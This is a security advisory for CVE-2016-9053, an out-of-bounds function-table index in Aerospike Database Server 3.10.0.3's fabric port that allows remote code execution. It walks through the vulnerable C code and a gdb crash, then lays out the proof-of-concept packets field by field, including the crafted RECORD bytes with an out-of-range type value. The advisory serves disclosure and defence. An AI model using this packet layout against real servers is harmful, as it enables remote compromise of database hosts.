Talos Vulnerability Report

TALOS-2016-0267

Aerospike Database Server RW Fabric Message Particle Type Code Execution Vulnerability

February 21, 2017
CVE Number

CVE-2016-9053

Summary

An exploitable out-of-bounds indexing vulnerability exists within the RW fabric message particle type of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause the server to fetch a function table outside the bounds of an array resulting in remote code execution. An attacker can simply connect to the port to trigger this vulnerability.

Tested Versions

Aerospike Database Server 3.10.0.3

Product URLs

https://github.com/aerospike/aerospike-server/tree/3.10.0.3

CVSSv3 Score

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-129 - Improper Validation of Array Index

Details

Aerospike Database Server is both a distributed and scalable NoSQL database that is used as a back-end for scalable web applications that need a key-value store. With a focus on performance, it is multi-threaded and retains its indexes entirely in ram with the ability to persist data to a solid-state drive or traditional rotational media.

When processing a packet from the fabric port, the server will handle it by calling the fabric_buffer_process_readable function. Inside this function, the server will read data from a socket and then hand the data off to the fabric_buffer_process_msg function [1]. Once inside fabric_buffer_process_msg, the server will parse the message in order to determine its type and size [2]. This is done first for an AS_FABRIC(0) message type which will be assigned to the fb->fne variable. Once the AS_FABRIC(0) message type is received from the wire, an attacker can then proceed to send another message type. Once the next message is received, this type will be used as an index into a list of callbacks [4]. This will then hand-off the packet to the correct handler for the specified message type.

as/src/fabric/fabric.c:1029
static bool
fabric_buffer_process_readable(fabric_buffer *fb)
{
...
        else if (fabric_buffer_process_msg(fb)) {   // [1]  \
\
as/src/fabric/fabric.c:986
static bool
fabric_buffer_process_msg(fabric_buffer *fb)
{
    msg *m = as_fabric_msg_get(fb->r_type);                     // [2]
...
    if (msg_parse(m, fb->r_buf, fb->r_msg_size) != 0) {
...
    }

    if (! fb->fne) {
        bool ret = fabric_buffer_process_fabric_msg(fb, m);     // [3]
        as_fabric_msg_put(m);
        return ret;
    }
...
    if (g_fabric_args->msg_cb[m->type]) {
        (*g_fabric_args->msg_cb[m->type])(fb->fne->node, m, g_fabric_args->msg_udata[m->type]); // [4]

This particular vulnerability using the M_TYPE_RW(7) message type. Once the message is finally sent to the fabric port,the server will call the rw_msg_cb function. Inside this function, the server will extract the operation type from the RW_FIELD_OP(0) field [1]. This enumeration will then be used to choose a case from a switch statement. Although the provided proof-of-concept uses the RW_OP_WRITE(1) message type [2], the RW_OP_MULTI(5) can also be used to trigger this vulnerability [2].

as/src/transaction/rw_request_hash.c:427
int
rw_msg_cb(cf_node id, msg* m, void* udata)
{
    uint32_t op;

    if (msg_get_uint32(m, RW_FIELD_OP, &op) != 0) {         // [1]
        cf_warning(AS_RW, "got rw msg without op field");
        as_fabric_msg_put(m);
        return 0;
    }
...
    switch (op) {
...
    case RW_OP_WRITE:
        repl_write_handle_op(id, m);                        // [2]
        break;
...
    case RW_OP_MULTI:
        {
...
            repl_write_handle_multiop(id, m);               // [2]
...
    }

In order to handle the operation, the server will extract a buffer from the RW_FIELD_RECORD(9) field [1]. This buffer contains a specific format that will then be handed off to the write_replica function for decoding [2]. Also within this structure is an array that contains the index that is key to this vulnerability.

as/src/transaction/replica_write.c:258
void
repl_write_handle_op(cf_node node, msg* m)
{
...
    uint8_t* pickled_buf;
    size_t pickled_sz;
...
    else if (msg_get_buf(m, RW_FIELD_RECORD, (uint8_t**)&pickled_buf,           // [1]
            &pickled_sz, MSG_GET_DIRECT) == 0) {
        // <><><><><><>  Write Pickle  <><><><><><>
...
        result = write_replica(&rsv, keyd, pickled_buf, pickled_sz, &rec_props, // [2]
                generation, void_time, last_update_time, node, info, &linfo);

Inside the write_replica function is the code that is responsible for parsing the RW_FIELD_RECORD(9) buffer. This buffer starts out with a uint16_t that represents the number of bins which are used to allocate an array [1], and then used to read data from the packet into [2]. After the bins are loaded, the write_replica function will then make a call to as_record_buf_get_stack_particles_sz to allocate a buffer on the stack [3].

as/src/transaction/replica_write.c:981
int
write_replica(as_partition_reservation* rsv, cf_digest* keyd,
        uint8_t* pickled_buf, size_t pickled_sz,
        const as_rec_props* p_rec_props, as_generation generation,
        uint32_t void_time, uint64_t last_update_time, cf_node master,
        uint32_t info, ldt_prole_info* linfo)
{
...
    bool has_sindex = (info & RW_INFO_SINDEX_TOUCHED) != 0 ||
            (is_create && as_sindex_ns_has_sindex(ns));
...
    // TODO - we really need an inline utility for this!
    rint16_t newbins = ntohs(*(uint16_t*)pickled_buf);                          // [1]
..
    as_bin stack_bins[rd.ns->storage_data_in_memory ? 0 : rd.n_bins];

    as_storage_rd_load_bins(&rd, stack_bins); // TODO - handle error returned   // [2]

    uint32_t stack_particles_sz = rd.ns->storage_data_in_memory ?
            0 : as_record_buf_get_stack_particles_sz(pickled_buf);              // [3]
    uint8_t stack_particles[stack_particles_sz + 256];
    uint8_t* p_stack_particles = stack_particles;

The call as_record_buf_get_stack_particles_sz will re-parse the pickled buffer that was read prior in order to determine the number of bins. Once the number of bins is returned, then a loop will iterate over each “bin” within the packet. For each bin, the as_particle_size_from_pickled function will be called. This function will read an uint8_t type [2] followed by a 32-bit value_size [3] which will be used to calculate the size of a “particle”. Due to the server not checking the bounds of the uint8_t type, an aggressor can specify an index that is outside the bounds of the particle_vtable array [4]. Each element of this array contains a list of function pointers. Once the correct element is determined according to the type index, the size_from_wire_fn function will be called with the value and value_size pulled directly from the packet.

as/src/base/record.c:335
uint32_t
as_record_buf_get_stack_particles_sz(uint8_t *buf) {
...
    uint16_t newbins = ntohs( *(uint16_t *) buf );
    buf += 2;

    for (uint16_t i = 0; i < newbins; i++) {
...
        stack_particles_sz += as_particle_size_from_pickled(&buf);  // [1]  \
    }

    return (stack_particles_sz);
}
\
as/src/base/particle.c:195
int32_t
as_particle_size_from_pickled(uint8_t **p_pickled)
{
    const uint8_t *pickled = (const uint8_t *)*p_pickled;
    uint8_t type = *pickled++;                                          // [2]
    const uint32_t *p32 = (const uint32_t *)pickled;
    uint32_t value_size = cf_swap_from_be32(*p32++);                    // [3]
    const uint8_t *value = (const uint8_t *)p32;

    *p_pickled = (uint8_t *)value + value_size;

    // TODO - safety-check type.
    return particle_vtable[type]->size_from_wire_fn(value, value_size); // [4]
}

Crash Information

# gdb -q -p `systemctl status aerospike.service | grep 'Main PID' | cut -d: -f2- | cut -d' ' -f2`
...

(gdb) c
Continuing.
[Switching to Thread 0x7f7174796700 (LWP 53400)]

Catchpoint 4 (signal SIGSEGV), 0x00000000004d9aaa in as_particle_size_from_pickled (p_pickled=0x7f71747951a8) at base/particle.c:207
207             return particle_vtable[type]->size_from_wire_fn(value, value_size);

(gdb) x/6i $pc - 8
   0x4d9aa2 <as_particle_size_from_pickled+114>:        mov    0xa9fd90(,%rdx,8),%rdx
=> 0x4d9aaa <as_particle_size_from_pickled+122>:        mov    0x30(%rdx),%rdx
   0x4d9aae <as_particle_size_from_pickled+126>:        mov    -0x30(%rbp),%rdi
   0x4d9ab2 <as_particle_size_from_pickled+130>:        mov    -0x24(%rbp),%esi
   0x4d9ab5 <as_particle_size_from_pickled+133>:        callq  *%rdx
   0x4d9ab7 <as_particle_size_from_pickled+135>:        add    $0x30,%rsp

(gdb) p type
$1 = 0xff

(gdb) p sizeof(particle_vtable) / sizeof(*particle_vtable)
$4 = 0x18

Exploit Proof-of-Concept

To execute the proof-of-concept (note: this is only provided to the vendor), simply extract and run it as follows:

$ python poc hostname:3001 $namespace
Trying to connect to hostname:3001
Sending 0x15 byte packet... done.
Sending 0x78 byte packet... done.

Each fabric packet for Aerospike server has the following structure. It begins with a 32-bit size, followed by an 16-bit message type. The size is then used to determine the number of fields that follow. Each field is prefixed with a 16-bit field id, and then a 16-bit storage type. After the storage type is a 32-bit size and then the data that represents the contents of the field. In order to send message types to Aerospike Server, at least two message types must be sent. The first one must be of an AS_FABRIC(0x0) type and include the node identifier using the id of FIELD_NODE(0x0) for one of its fields. The FIELD_NODE(0x0) field uses a UINT64(0x4) for its type and can simply be an arbitrary number.

<class aspie.msg_fabric>
[0] <instance uint32_t 'size'> +0x0000000f (15)
[4] <instance aspie.M_TYPE 'type'> FABRIC(0x0)
[6] <instance array(aspie.msg_fabric_field,1) 'fields'> aspie.msg_fabric_field[1] "\x00\x00\x04\x00\x00\x00\x08\xe9\x07\x4e\xd5\x31\xa5\x0d\xe2"

<class aspie.msg_fabric_field> '0'
[6] <instance aspie.fabric_field_id 'id'> FIELD_NODE(0x0)
[8] <instance aspie.M_FT 'type'> UINT64(0x4)
[9] <instance uint32_t 'size'> +0x00000008 (8)
[d] <instance uint64_t 'content'> +0xe9074ed531a50de2 (16791476413242084834)

Once the AS_FABRIC(0x0) message has been sent, the proof-of-concept will follow with a message of type AS_RW(0x7). This second message sent by the proof-of-concept has the following format.

<class aspie.msg_fabric>
[0] <instance uint32_t 'size'> +0x00000072 (114)
[4] <instance aspie.M_TYPE 'type'> RW(0x7)
[6] <instance array(aspie.msg_fabric_field,7) 'fields'> aspie.msg_fabric_field[7] "\x00\x00\x02\x00\x00\x00\x04  ..skipped ~94 bytes.. \x00\x00\x04\x1d\x0c\xda\x12"

An AS_RW(0x7) packet has a number of fields that can be used to make that particular request. One of the fields is the OP(0x0) which specifies what kind of operation to make. This vulnerability depends on the WRITE(0x1) operation and so the field for OP(0x0) must be defined as a UINT32(0x2) with a value of WRITE(0x1). In order to reach the vulnerable code described in this advisory, a number of other fields must also be defined. Each of these fields will be described individually.

<class aspie.msg_fabric_field> '0'
[6] <instance aspie.rw_field_id 'id'> OP(0x0)
[8] <instance aspie.M_FT 'type'> UINT32(0x2)
[9] <instance uint32_t 'size'> +0x00000004 (4)
[d] <instance aspie.RW_OP_ 'content'> WRITE(0x1)

Most fabric packet types include a string representing the NAMESPACE(0x2) that the query is actually referring to. At offset 0x11 of the second packet send by the proof-of-concept is a string representing the namespace as so chosen by the user. This must be a BUF(0x6) type and can contain any kind of arbitrary content.

<class aspie.msg_fabric_field> '1'
[11] <instance aspie.rw_field_id 'id'> NAMESPACE(0x2)
[13] <instance aspie.M_FT 'type'> BUF(0x6)
[14] <instance uint32_t 'size'> +0xXXXXXXXX (X)
[18] <instance block 'content'> ...

The next field sent by the proof-of-concept, is another string representing the DIGEST(0x5). This must also be a BUF(0x6) type and can contain arbitrary content.

<class aspie.msg_fabric_field> '2'
[1b] <instance aspie.rw_field_id 'id'> DIGEST(0x5)
[1d] <instance aspie.M_FT 'type'> BUF(0x6)
[1e] <instance uint32_t 'size'> +0x00000008 (8)
[22] <instance block 'content'> "\x3f\x81\x3c\xaf\xaa\x3d\x12\x63"

The next required field is of the type INFO(0xc). This field is an enumeration and isn’t required at all to trigger this vulnerability. It is simply set to 0x00000000 although it can be of any value. The two required fields at the end of the packet are of type GENERATION(0x4) and VOID_TIME(0xb). These fields are simply UINT32(0x2) types and are not significant except in that the contents of GENERATION(0x4) must not be equal to 0.

<class aspie.msg_fabric_field> '3'
[2a] <instance aspie.rw_field_id 'id'> INFO(0xc)
[2c] <instance aspie.M_FT 'type'> +0x00 (0)
[2d] <instance uint32_t 'size'> +0x00000000 (0)
[31] <instance aspie.RW_INFO_ 'content'> +0x0 (0)

<class aspie.msg_fabric_field> '5'
[62] <instance aspie.rw_field_id 'id'> GENERATION(0x4)
[64] <instance aspie.M_FT 'type'> UINT32(0x2)
[65] <instance uint32_t 'size'> +0x00000004 (4)
[69] <instance uint32_t 'content'> +0xc669712b (3328799019)

<class aspie.msg_fabric_field> '6'
[6d] <instance aspie.rw_field_id 'id'> VOID_TIME(0xb)
[6f] <instance aspie.M_FT 'type'> UINT32(0x2)
[70] <instance uint32_t 'size'> +0x00000004 (4)
[74] <instance uint32_t 'content'> +0x1d0cda12 (487381522)

The 5th field of the AS_RW(0x7) message type contains an identifier of RECORD(0x9) and storage type of BUF(0x6). This message type contains an embedded structure which is key to triggering this vulnerability.

<class aspie.msg_fabric_field> '4'
[31] <instance aspie.rw_field_id 'id'> RECORD(0x9)
[33] <instance aspie.M_FT 'type'> BUF(0x6)
[34] <instance uint32_t 'size'> +0x0000002a (42)
[38] <instance ptype.block 'content'> "\x00\x01\x11\x00\x42\x73\xcf\xb8\x94\x0b\x2a\xf2\x34\x2e\x28\x58\xae\x6a\x76\x56\x00\xff\x00\x00\x00\x10\x55\x2c\x49\x40\x69\xe7\xef\x23\x77\x6c\x39\x2b\xff\x39\x41\xdc"

At the beginning of the content of the RECORD(0x9) field is a uint16_t that describes the number of elements that follow. Within the provided proof-of-concept, this is simply set to 0x0001 as there’s only one element that was required to trigger this vulnerability.

<class pickled_record>
[38] <instance uint16_t 'newbins'> +0x0001 (1)
[3a] <instance array(bin,1) 'bin'> bin[1] "\x11\x00\x42\x73\xcf\xb8\x94\x0b\x2a\xf2\x34\x2e\x28\x58\xae\x6a\x76\x56\x00\xff\x00\x00\x00\x10\x55\x2c\x49\x40\x69\xe7\xef\x23\x77\x6c\x39\x2b\xff\x39\x41\xdc"

Each element has the following structure. This structure is parsed in order to extract the index that is misused by the server. The name_sz field is used to determine the length of the string name defined within the structure. If the type field in any of these elements is larger than 24, then the specified type will index out of the bounds of the array of function tables within the server.

<class bin> '0'
[3a] <instance uint8_t 'name_sz'> +0x11 (17)
[3b] <instance uint8_t 'version'> +0x00 (0)
[3c] <instance szstring<char_t> 'name'> "\x42\x73\xcf\xb8\x94\x0b\x2a\xf2\x34\x2e\x28\x58\xae\x6a\x76\x56\x00"
[4d] <instance uint8_t 'type'> +0xff (255)
[4e] <instance uint32_t 'value_size'> +0x00000010 (16)
[52] <instance block(16) 'value'> "\x55\x2c\x49\x40\x69\xe7\xef\x23\x77\x6c\x39\x2b\xff\x39\x41\xdc"

Mitigation

Is it recommended to use technology such as a firewall to deny illegitimate users access to the ports required by the server for clustering.

Timeline

2016-12-23 - Vendor Disclosure
2017-02-21 - Public Release

Credit

Discovered by the Cisco Talos Team